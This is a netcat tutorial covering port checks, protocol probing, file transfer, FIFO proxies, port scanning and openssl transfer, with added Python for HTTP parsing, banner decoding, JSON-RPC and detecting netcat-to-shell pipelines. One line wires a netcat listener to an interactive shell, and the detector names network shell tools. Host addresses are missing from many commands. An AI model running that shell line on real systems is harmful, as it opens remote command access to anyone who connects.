Introduction to netcat

Netcat is a popular command line network tool. Its main job is to establish a transport layer connection and let you read and write application layer data over it interactively. It supports the TCP and UDP transport protocols and also Unix domain sockets. It can connect to a server as a client, or act as a server and provide a network interface for some program. It can be used for troubleshooting, file transfer and as a layer 4 (transport layer) proxy.

A Unix domain socket uses a path in the file system as its address, which system processes can refer to, so two processes can open the same Unix domain socket to communicate. This communication happens inside the kernel, not over the network.


Some uses

Network troubleshooting

  1. Check whether a port is open
    • nc 22 -v
  2. Check whether a port is available
    • nc 2345 -v


Some plaintext protocols can be spoken directly to the server this way, for example HTTP, Redis, memcache and SMTP.

  1. HTTP client
    • Single HTTP request
      • printf "GET / HTTP/1.1\r\n\r\n" | nc 8000
    • Multiple HTTP requests (read from a file)
      • nc 8080 < multiple_http_request
  2. Redis client
    • nc 6379
  3. SMTP client
    • nc 25 -v
  4. memcache client
    • nc 11211 -v
  5. JSON RPC client
    • nc 8101 -v
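The single HTTP request above is the minimum that works, but it omits the Host header that HTTP/1.1 requires and leaves the connection open, so nc seems to hang after the reply. The following is an added example, written for this page and not code from the original post: it builds the request bytes you would pipe into nc and parses the raw reply nc prints back. The host name and the sample reply are constructed for illustration.

```python
# Added example (not from the original post): the bytes that
#   printf "GET / HTTP/1.1\r\n\r\n" | nc <host> 8000
# sends, built properly, plus a parser for the raw reply nc prints back.
# Host name and the sample reply below are constructed for illustration.

SAMPLE_REPLY = (  # constructed: what a small server might send back
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/plain\r\n"
    b"Content-Length: 5\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"hello"
)


def build_request(path="/", host="example.test", method="GET"):
    """Return the raw request bytes to pipe into nc.

    HTTP/1.1 makes the Host header mandatory (a virtual-hosting server answers
    400 without it), and without "Connection: close" the server keeps the
    socket open after replying, so nc appears to hang until you press Ctrl-D.
    """
    lines = [f"{method} {path} HTTP/1.1", f"Host: {host}", "Connection: close"]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def parse_response(raw):
    """Split a raw HTTP reply into (status_code, headers, body).

    Header names are lower-cased; the body is cut to Content-Length so that a
    truncated read or trailing garbage is noticed instead of silently accepted.
    """
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete reply: end of headers not found")
    status_line, *header_lines = head.decode("iso-8859-1").split("\r\n")
    parts = status_line.split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("HTTP/"):
        raise ValueError(f"not an HTTP status line: {status_line!r}")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if "content-length" in headers:
        length = int(headers["content-length"])
        if len(body) < length:
            raise ValueError(f"body truncated: {len(body)} of {length} bytes")
        body = body[:length]
    return int(parts[1]), headers, body


if __name__ == "__main__":
    print(build_request("/", "example.test").decode())
    print(parse_response(SAMPLE_REPLY))
```

Pipe the output of build_request into nc exactly as the printf command does; parse_response accepts what nc writes to stdout, and the Content-Length check is what tells you whether the connection was cut before the whole body arrived.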

Protocol detection

For some protocols that are not plaintext, such as SSH and MySQL, interacting with the server this way is not very convenient, but we can still tell the protocol type from what the server sends first.

  1. SSH Protocol detection

    • nc 22
    • Output: SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.3
  2. MySQL Protocol detection
    • nc 3306
    • Output: Q5.7.21-20-log}El/n}f a-ag[qgosOmysql_native_password
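The odd characters nc prints around the MySQL version string are the binary fields of the server's first handshake packet (the leading Q is the packet length byte). The following is an added example, not code from the original post, that identifies the protocol from those opening bytes and decodes the fields instead of reading them by eye. The SSH line is the one shown above; the MySQL packet is constructed to match the protocol-10 handshake layout, and the connection id and auth data in it are made up.

```python
# Added example (not from the original post): identify the protocol from the
# first bytes a server sends, the way the SSH and MySQL banners above are read
# by eye. The MySQL handshake packet below is constructed for illustration;
# the SSH line is the one shown on the page.
import struct

CLIENT_SECURE_CONNECTION = 0x00008000  # MySQL capability flags
CLIENT_PLUGIN_AUTH = 0x00080000

SSH_BANNER = b"SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.3\r\n"


def build_sample_mysql_handshake():
    """Constructed protocol-v10 handshake, the packet a MySQL server sends
    first; the odd bytes nc prints around the version string are these fields."""
    payload = (
        b"\x0a"                       # protocol version 10
        + b"5.7.21-20-log\x00"        # server version, NUL terminated
        + struct.pack("<I", 81)       # connection id (made up)
        + b"abcdefgh" + b"\x00"       # auth-plugin-data part 1 + filler
        + struct.pack("<H", 0xF7FF)   # capability flags, lower 16 bits
        + b"\x21"                     # character set
        + struct.pack("<H", 0x0002)   # status flags
        + struct.pack("<H", 0x00FF)   # capability flags, upper 16 bits
        + b"\x15"                     # auth-plugin-data length (21)
        + b"\x00" * 10                # reserved
        + b"ijklmnopqrst\x00"         # auth-plugin-data part 2 (13 bytes)
        + b"mysql_native_password\x00"
    )
    return len(payload).to_bytes(3, "little") + b"\x00" + payload


def parse_ssh_banner(data):
    """SSH-protoversion-softwareversion [SP comments] CR LF (RFC 4253 4.2)."""
    text = data.decode("ascii", "replace").rstrip("\r\n")
    if not text.startswith("SSH-"):
        raise ValueError("not an SSH identification string")
    ident, _, comment = text.partition(" ")
    _, proto, software = ident.split("-", 2)
    return {"protocol": proto, "software": software, "comment": comment or None}


def parse_mysql_handshake(packet):
    """Walk the v10 handshake fields; raises ValueError on anything unexpected."""
    length = int.from_bytes(packet[:3], "little")
    payload = packet[4:4 + length]
    if len(payload) != length or not payload or payload[0] != 0x0A:
        raise ValueError("not a MySQL protocol-10 handshake")
    end = payload.index(b"\x00", 1)
    version = payload[1:end].decode("ascii")
    pos = end + 1
    conn_id = struct.unpack_from("<I", payload, pos)[0]
    pos += 4 + 8 + 1                  # connection id, auth data part 1, filler
    cap_lower = struct.unpack_from("<H", payload, pos)[0]
    pos += 2 + 1 + 2                  # capabilities, charset, status
    cap_upper = struct.unpack_from("<H", payload, pos)[0]
    pos += 2
    capabilities = (cap_upper << 16) | cap_lower
    auth_len = payload[pos]
    pos += 1 + 10                     # length byte, reserved
    if capabilities & CLIENT_SECURE_CONNECTION:
        pos += max(13, auth_len - 8)  # auth data part 2
    plugin = None
    if capabilities & CLIENT_PLUGIN_AUTH:
        plugin = payload[pos:payload.index(b"\x00", pos)].decode("ascii")
    return {"version": version, "connection_id": conn_id, "auth_plugin": plugin}


def identify(first_bytes):
    """Return (protocol name, parsed fields) for a server's opening bytes."""
    if first_bytes.startswith(b"SSH-"):
        return "ssh", parse_ssh_banner(first_bytes)
    if len(first_bytes) > 4 and first_bytes[4] == 0x0A:
        try:
            return "mysql", parse_mysql_handshake(first_bytes)
        except (ValueError, struct.error, IndexError):
            pass
    return "unknown", None
```

Feed identify() the first few hundred bytes nc receives; anything that is neither an SSH identification string nor a valid handshake comes back as unknown rather than being guessed at.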

Server side

netcat can listen on an address and act as a server, accepting requests from clients.

  • Listen on local port 2345: nc -l 2345

File transfer

  • Server side: nc -l 2345 < test.php
  • Client: nc > test.php
As a network interface for a program

This needs a named pipe to redirect the input and output of the two processes into each other.

A named pipe is a first-in-first-out mechanism for communication between processes on a computer. It is an extension of the traditional pipe on Unix-like systems. Traditional pipes are anonymous and live no longer than the process that created them, while a named pipe can live as long as the operating system is running.

Unlike the traditional anonymous shell pipe, a named pipe uses the file system: it is created with mkfifo or mknod, and two processes can open it by name to read from and write to it. The program behind the pipe here is a simple JSON-RPC implementation: it reads requests from standard input and writes the JSON-RPC responses to standard output.

  • Create the named pipe: mkfifo /tmp/jsonrpc
  • jsonrpc server side: nc -l 2345 < /tmp/jsonrpc | ./ > /tmp/jsonrpc
  • jsonrpc client: nc 2345
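As an added example, not the program the post runs and not code from the original, here is a minimal JSON-RPC 2.0 responder of the kind that sits in the middle of that pipeline: one request per line on standard input, one response per line on standard output. The add and echo methods are made up for the demonstration.

```python
# Added example (not from the original post): a minimal JSON-RPC 2.0 responder
# that reads one request per line from stdin and writes one response per line
# to stdout, so it can be plugged into the named-pipe loop above in place of
# the program the post runs. The methods it exposes are made up for the demo.
import json
import sys

METHODS = {
    "add": lambda a, b: a + b,
    "echo": lambda message: message,
}


def _error(req_id, code, message):
    return {"jsonrpc": "2.0", "error": {"code": code, "message": message}, "id": req_id}


def handle_request(line):
    """Turn one request line into a response dict (JSON-RPC 2.0 error codes)."""
    try:
        req = json.loads(line)
    except ValueError:
        return _error(None, -32700, "Parse error")
    if not isinstance(req, dict) or req.get("jsonrpc") != "2.0" or "method" not in req:
        return _error(None, -32600, "Invalid Request")
    req_id = req.get("id")
    func = METHODS.get(req["method"])
    if func is None:
        return _error(req_id, -32601, "Method not found")
    params = req.get("params", [])
    try:
        result = func(**params) if isinstance(params, dict) else func(*params)
    except TypeError:
        return _error(req_id, -32602, "Invalid params")
    return {"jsonrpc": "2.0", "result": result, "id": req_id}


def respond(lines):
    """Responses for an iterable of request lines; blank lines are skipped."""
    return [json.dumps(handle_request(line)) for line in lines if line.strip()]


def serve(stdin=sys.stdin, stdout=sys.stdout):
    """Loop for use behind the named pipe. flush() matters: with stdout being a
    pipe rather than a terminal, Python block-buffers it and the nc client would
    otherwise see nothing until the buffer fills or the process exits."""
    for line in stdin:
        for reply in respond([line]):
            stdout.write(reply + "\n")
            stdout.flush()


if __name__ == "__main__":
    serve()
```

Run it as the program in the pipeline (nc -l 2345 < /tmp/jsonrpc | python3 this_file.py > /tmp/jsonrpc) and type a request line into the nc client; the explicit flush after every response is what makes the answer appear immediately on the client side.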


Reverse proxy


mkfifo /tmp/netcat_tunnel
nc -l 8081 < /tmp/netcat_tunnel | nc 80 > /tmp/netcat_tunnel
curl -H 'Host:'


nc -l 8081 < /tmp/netcat_tunnel | nc 443 > /tmp/netcat_tunnel
curl -H 'Host:' -I -k


nc -l 8081 < /tmp/netcat_tunnel | nc 22 > /tmp/netcat_tunnel
ssh root@ -p8081 -i ~/.ssh/id_rsa


Port scanning

Scan ports 22 to 80 on a host

nc -z 22-80

Reverse shell

nc -l 2345 < /tmp/netcat_tunnel | sh -i > /tmp/netcat_tunnel
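The same plumbing that gives a program a network interface gives a shell one, which is why this pattern is worth flagging in process telemetry. The following is an added example, not from the original post, that runs simple detection logic over constructed command lines (the first is the page's own): it parses each line into pipeline stages and reports when a netcat listener and a shell share a pipeline, also looking inside sh -c '...' wrappers.

```python
# Added example (not from the original post): detection logic for the listener
# pattern shown above, run over constructed process command lines such as an
# EDR or auditd feed might provide. The sample lines are made up except the
# first, which is the page's own command.
import os
import shlex

NETCAT = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}
SHELLS = {"sh", "bash", "dash", "zsh", "ksh", "ash"}

SAMPLE_CMDLINES = [  # constructed telemetry
    "nc -l 2345 < /tmp/netcat_tunnel | sh -i > /tmp/netcat_tunnel",
    "nc -l 2345 < test.php",
    "nc -l 8081 < /tmp/netcat_tunnel | nc backend.internal 80 > /tmp/netcat_tunnel",
    "bash -c 'cat /etc/hostname'",
]

SEPARATORS = {"|", "||", ";", "&&", "&"}


def _stages(cmdline):
    """Split a shell command line into pipeline stages (argv lists).
    punctuation_chars makes |, ;, &, < and > their own tokens while quoted
    strings stay intact, so sh -c '...' keeps its script as one argument."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    try:
        tokens = list(lexer)
    except ValueError:  # unbalanced quotes: fall back to whitespace
        tokens = cmdline.split()
    stages, current = [], []
    for tok in tokens:
        if tok in SEPARATORS:
            if current:
                stages.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        stages.append(current)
    return stages


def analyze(cmdline):
    """Return the reasons a command line looks like netcat wired to a shell;
    an empty list means nothing of interest was found."""
    nc_listen = shell = redirected = False
    for argv in _stages(cmdline):
        prog = os.path.basename(argv[0])
        if prog in NETCAT:
            nc_listen |= "-l" in argv
            redirected |= any(tok in ("<", ">") for tok in argv)
        elif prog in SHELLS:
            shell = True
            if "-c" in argv[1:-1]:  # sh -c '...': look inside the script too
                inner = analyze(argv[argv.index("-c") + 1])
                if inner:
                    return inner
    reasons = []
    if nc_listen and shell:
        reasons.append("netcat listener and a shell in the same pipeline")
        if redirected:
            reasons.append("netcat stdin/stdout redirected through a file (FIFO loop)")
    return reasons


def scan(cmdlines):
    """Map each flagged command line to its reasons."""
    flagged = {}
    for cmdline in cmdlines:
        reasons = analyze(cmdline)
        if reasons:
            flagged[cmdline] = reasons
    return flagged


if __name__ == "__main__":
    for cmdline, reasons in scan(SAMPLE_CMDLINES).items():
        print(cmdline, "->", "; ".join(reasons))
```

The file transfer and reverse proxy lines from this page pass through untouched, since neither puts a shell in the pipeline; the rule keys on the combination, not on netcat by itself.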


The openssl suite provides two subcommands, s_server and s_client, which are an SSL server and an SSL client respectively.

Encrypted file transfer (openssl)

  1. Generate a self-signed certificate
    openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365
  2. Start the openssl server
    openssl s_server -key key.pem -cert cert.pem -port 2345 < test.php
  3. The client receives the file (s_client writes the received data to its standard output, so redirect that to the file)
    openssl s_client -host -port 2345 -quiet > test.php